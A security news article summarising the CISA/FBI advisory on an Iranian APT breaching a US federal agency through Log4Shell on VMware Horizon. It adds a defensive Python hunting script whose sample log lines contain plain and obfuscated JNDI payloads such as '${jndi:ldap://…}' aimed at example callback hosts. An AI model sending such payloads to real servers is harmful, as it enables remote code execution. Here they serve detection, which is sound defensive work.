Iranian APT Actor Breached US Government Organization Using Log4Shell Exploit

An Iranian government-sponsored Advanced Persistent Threat (APT) actor exploited the Log4Shell vulnerability (CVE-2021-44228) in an unpatched VMware Horizon server belonging to a Federal Civilian Executive Branch (FCEB) organization, according to a joint advisory (AA22-320A) from the Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI).

CISA and the FBI began incident response at the organization in mid-June 2022 after suspected APT activity was identified. The investigation found that the threat actors had gained access to the Horizon server as early as February 2022 by exploiting Log4Shell, installed XMRig cryptocurrency mining software, and then moved laterally to the domain controller (DC). They downloaded several tools, including PsExec, Mimikatz, and Ngrok: Mimikatz was used to steal credentials, and Ngrok reverse proxies were implanted on multiple hosts to maintain persistence. The miner is worth noting: a cryptominer running on an internet-facing Horizon server is often the first visible sign of a Log4Shell compromise, and finding one should prompt a hunt for the quieter activity (credential theft and tunnelling) that typically follows.

Log4Shell was disclosed in December 2021, and threat actors began exploiting it on unpatched systems almost immediately; scanning for vulnerable servers started right after the disclosure. VMware warned all Horizon customers in January 2022 to protect their servers against attacks leveraging the vulnerability, and CISA warned in June 2022 that nation-state actors from Iran, China, North Korea, and Turkey, as well as cybercriminal groups, were exploiting Log4Shell on VMware Horizon and Unified Access Gateway (UAG) servers. Attacks on vulnerable servers have delivered ransomware, information stealers, backdoors, and cryptocurrency miners.

CISA and the FBI have warned all organizations running the affected VMware products that have neither patched the Log4Shell vulnerability nor applied the recommended mitigations to do so immediately. The recommendations include updating affected systems to the latest version, minimizing the internet-facing attack surface, implementing best practices for identity and access management, exercising, testing, and validating the organization's security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework, and testing existing security controls against the ATT&CK techniques outlined in the advisory.

Organizations that did not promptly patch or mitigate Log4Shell should assume they have already been compromised and should initiate threat hunting rather than treating the patch itself as remediation. If initial access or compromise is detected, they should assume lateral movement has also occurred, investigate all connected systems for signs of compromise, and audit all privileged accounts.
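One concrete starting point for such a hunt, added here as an illustration and not taken from the CISA/FBI advisory, is to look for Log4Shell exploitation attempts in the request logs of the exposed server. The payload is a Log4j lookup of the form `${jndi:ldap://attacker/...}`, and attackers routinely disguise the `jndi` prefix with nested lookups (`${lower:j}`, `${::-j}`, `${env:NOPE:-j}`) that Log4j resolves before matching, so a naive string search misses them. The Python script below normalizes those lookups from the inside out and then extracts the JNDI scheme and callback host. The log lines are constructed for this example (documentation-range IP addresses, a generic access-log layout with the payload in the User-Agent and query string); which fields of a Horizon server's logs actually carry attacker-controlled input depends on the deployment.

```python
import re

# Nested-lookup obfuscations commonly seen in Log4Shell payloads. Log4j 2.x
# resolves inner lookups before it matches the "jndi" prefix, so the detector
# has to do the same. Both patterns only match innermost lookups (no nested
# "${" or "}" inside), which is why normalization runs in rounds.
_CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)
# ${env:NOPE:-j} and ${::-j} both resolve to their default value "j" when the
# named lookup fails; for hunting purposes we assume the attacker chose a key
# that is undefined, so the default is what Log4j would substitute.
_DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
# After normalization: the jndi prefix, the protocol, and the callback host:port.
# Log4j lower-cases the prefix before matching, so "JNDI" works too.
_JNDI = re.compile(r"\$\{jndi:([a-z]+)://([^/}\s]+)", re.IGNORECASE)


def normalize_lookups(text: str, max_rounds: int = 20) -> str:
    """Collapse obfuscated Log4j lookups from the inside out."""
    for _ in range(max_rounds):
        new = _CASE_LOOKUP.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper(),
            text,
        )
        new = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), new)
        if new == text:  # nothing left to resolve
            return text
        text = new
    return text  # give up on pathological nesting depth


def find_jndi(line):
    """Return (scheme, target) if the line carries a JNDI lookup, else None."""
    m = _JNDI.search(normalize_lookups(line))
    if not m:
        return None
    return m.group(1).lower(), m.group(2)


def scan_log(lines):
    """Return [(line_no, scheme, target)] for every line with a JNDI lookup."""
    hits = []
    for n, line in enumerate(lines, start=1):
        hit = find_jndi(line)
        if hit:
            hits.append((n, hit[0], hit[1]))
    return hits


# Constructed sample log lines (not real data): one benign request, a plain
# payload in the User-Agent, a heavily obfuscated payload, and a payload in the
# query string.
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Feb/2022:03:14:07 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [12/Feb/2022:03:14:09 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.9:1389/a}"',
    '203.0.113.9 - - [12/Feb/2022:03:15:11 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" '
    '"${${lower:j}${upper:n}di:${::-l}${env:NOPE:-d}ap://203.0.113.9:1389/x}"',
    '198.51.100.7 - - [12/Feb/2022:03:16:00 +0000] "GET /portal/?q=${jndi:rmi://198.51.100.7/Exploit} HTTP/1.1" 404 0 "-" "curl/7.79"',
]

if __name__ == "__main__":
    for line_no, scheme, target in scan_log(SAMPLE_LOG):
        print(f"line {line_no}: jndi lookup via {scheme} to {target}")
```

A hit only proves an attempt; confirming exploitation means checking whether the server made an outbound LDAP/RMI connection to the extracted target around the same timestamp, which is also the host to block and pivot on across the rest of the estate.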

Author: Richard Anderson

Richard Anderson is the Editor-in-Chief of